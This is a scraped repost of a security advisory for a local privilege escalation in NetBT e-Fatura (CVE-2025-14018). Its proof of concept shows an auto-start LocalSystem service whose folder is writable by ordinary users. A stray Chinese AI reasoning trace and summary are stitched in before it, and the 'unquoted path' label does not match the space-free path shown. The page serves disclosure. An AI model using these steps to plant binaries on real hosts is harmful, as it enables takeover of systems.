NetBT e-Fatura Privilege Escalation
好的,我现在要处理用户的请求。用户希望我用中文总结一篇文章,控制在100字以内,并且不需要特定的开头。文章内容涉及NetBT e-Fatura的一个漏洞,类型是CWE-428,影响是本地用户可以提升权限执行任意代码。 首先,我需要理解文章的主要内容。漏洞标题是NetBT e-Fatura的权限提升,作者是Seccops,发现日期是2025年10月3日。影响描述中提到未经授权的本地用户可以执行任意代码,获得高权限。PoC部分显示服务的二进制路径没有正确引用,导致权限问题。 接下来,我要将这些信息浓缩到100字以内。重点包括漏洞名称、类型、影响以及利用方式。可能需要提到未正确引用的搜索路径导致的问题。 然后,我需要确保语言简洁明了,避免使用复杂的术语,同时保持专业性。可能的结构是:漏洞名称、类型、影响、利用方式和后果。 最后,检查字数是否符合要求,并确保没有遗漏关键信息。这样总结后的内容应该能够准确传达文章的核心内容。 </think> NetBT e-Fatura 存在权限提升漏洞(CVE-2025-14018),源于未正确引用的搜索路径(CWE-428)。攻击者可利用此漏洞以高权限执行任意代码。 2026-4-14 19:5:59 Author: cxsecurity.com(查看原文) 阅读量:13 收藏

# Exploit Title: NetBT e-Fatura - Privilege Escalation # Author: Seccops # Discovery Date: 2025-10-03 # Vendor: https://net-bt.com.tr/e-fatura/ # Tested Version: 2024 # Tested on OS: Microsoft Windows Server 2019 DC # Vulnerability Type: CWE-428 Unquoted Search Path or Element # CVE: CVE-2025-14018 Note: Thanks "Levent Sungu" for providing the testing environment. ==================== Description & Impact ==================== This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system. ================ Proof of Concept ================ C:\Users\efatura>sc qc InboxProcessor [SC] QueryServiceConfig SUCCESS SERVICE_NAME: InboxProcessor TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : InboxProcessor DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\" Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com C:\inetpub\wwwroot\InboxProcessor RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators


文章来源: https://cxsecurity.com/issue/WLB-2026040009
如有侵权请联系:admin#unsafe.sh